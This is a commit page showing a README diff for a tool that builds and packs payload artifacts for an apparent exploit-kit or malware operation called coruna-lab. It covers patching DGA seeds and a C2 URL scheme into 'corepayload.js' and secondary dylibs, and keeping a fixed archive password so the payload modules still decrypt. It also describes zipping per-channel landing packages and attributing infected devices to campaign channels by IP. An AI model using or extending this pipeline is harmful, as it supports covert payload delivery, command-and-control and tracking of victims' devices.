feat: xxbb

This commit is contained in:
hashbro
2026-08-14 02:59:21 +08:00
parent 31924ca770
commit 5bf6852f66
82 changed files with 2890 additions and 521 deletions
+54 -27
View File
@@ -1,46 +1,73 @@
# channel-builder-new
xxbb / weifile channel builder for coruna-lab. Separate from `channel-builder/`
xxbb / weifile builder for coruna-lab. Separate from `channel-builder/`
(lab `web/` + `sync/` layout).
Applies **shared** artifacts:
`c` is a **shared DGA seed** (env `XXBB_CHANNEL_C`). After deploy, domains do
not change, so `c` cannot tell channels apart. Per-channel identity is the
8-char landing code (e.g. `FAFA9988`) packed into `index.js`.
- `/weifile/weifile.html` (+ stages / patched secondary `.min.js`)
- `/details/` (`show.html` + patched `corepayload.js` + plugins)
This pass patches:
1. **weifile secondary type-0x01** — DGA seeds + reporting field `c`
2. **details/corepayload** — all `c` slots (DGA + `/event` field), then rewrites
`show.html` core `sha256` / `size`
## 1. Build once (shared artifacts)
```bash
cd channel-builder-new
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python tools/build.py \
--channel-c <32-hex> \
--apply --force
# specified c
.venv/bin/python tools/build.py --channel-c <32-hex> --apply --force
# or random c
.venv/bin/python tools/build.py --random-c --apply --force
# or from Laravel (uses XXBB_CHANNEL_C when set)
php artisan xxbb:build
php artisan xxbb:build --random-c
php artisan xxbb:build --channel-c=<32-hex>
```
Writes `{artifact-root}/weifile/` and `{artifact-root}/details/` (default
`../public`).
Writes:
DGA seeds: omit `--deployment-seed` / `--reporting-seed` to reuse
`storage/app/channel-builder-new/lab_seeds.json`, or generate them on first run.
First generate writes one random seed and copies it to both deployment and
reporting (same as `channel-builder`). CLI pair must also match. Domain list is
`DGA(channel_c)` (native pools use `c`, not the dep/rep C-strings).
- `{artifact-root}/details/` (default `../public/details`) — **published**
- `{state-root}/out/weifile/` (default `storage/app/channel-builder-new/out/weifile`) — **staged, not moved to public**
`index.js` `https://[placeholder].icu` is replaced with **DGA(`c`)[0]**.
`CACACACA` is left in place for per-channel packing.
Prints `XXBB_CHANNEL_C=…` and the domain list. Put that `c` in `.env` so
device ingest can recognize the shared native field.
Do **not** change the 7zAES password `202800cfb1ad3de68e11239dcc26c30b`.
## 2. Pack on channel create
Admin create (8-char id) runs `tools/pack_channel.py`:
1. Copy staged weifile
2. Replace `CACACACA` in `index.js` with the channel id
3. Zip to `public/channel-source-new/{CHANNELID}.zip`
```bash
.venv/bin/python tools/pack_channel.py \
--channel-code FAFA9988 \
--zip-out ../public/channel-source-new/FAFA9988.zip
```
If staged weifile is missing: run step 1 first (`php artisan xxbb:build`).
Delete a new channel removes that zip only (shared `/details` stays).
## Device attribution
- **Old channels:** payload `c` is the 32-hex `channel_id`
- **New channels:** payload `c` is the shared seed. On device create, match
`PageVisit` by IP in the last 30 minutes (`XXBB_VISIT_MATCH_MINUTES`). Use
that visit’s `channelCode` as `channel_id`, and store the landing domain on
`devices.source_domain`.
| Flag | What it replaces | Where |
|------|------------------|--------|
| `--deployment-seed` | DGA seed slot | secondary dylibs (1 hit each) |
| `--reporting-seed` | Reporting DGA seed slot | secondary dylibs (1 hit each) |
| `--channel-c` | Native report / DGA `c` (`202700cf…`) | secondary (1) + corepayload (6) |
| `--scheme` | Native DGA/C2 URL scheme | secondary dylibs (default `https`) |
Do **not** change the 7zAES password `202800cfb1ad3de68e11239dcc26c30b`
(one nibble off original `c`). Details modules still decrypt with that password.
`index.js` iptj URL / `channelCode` are not patched here.
| `--channel-c` | Native report / DGA `c` | each secondary (1) + corepayload (6) |
| `--random-c` | Generate a new `--channel-c` | lab_seeds.json + domains |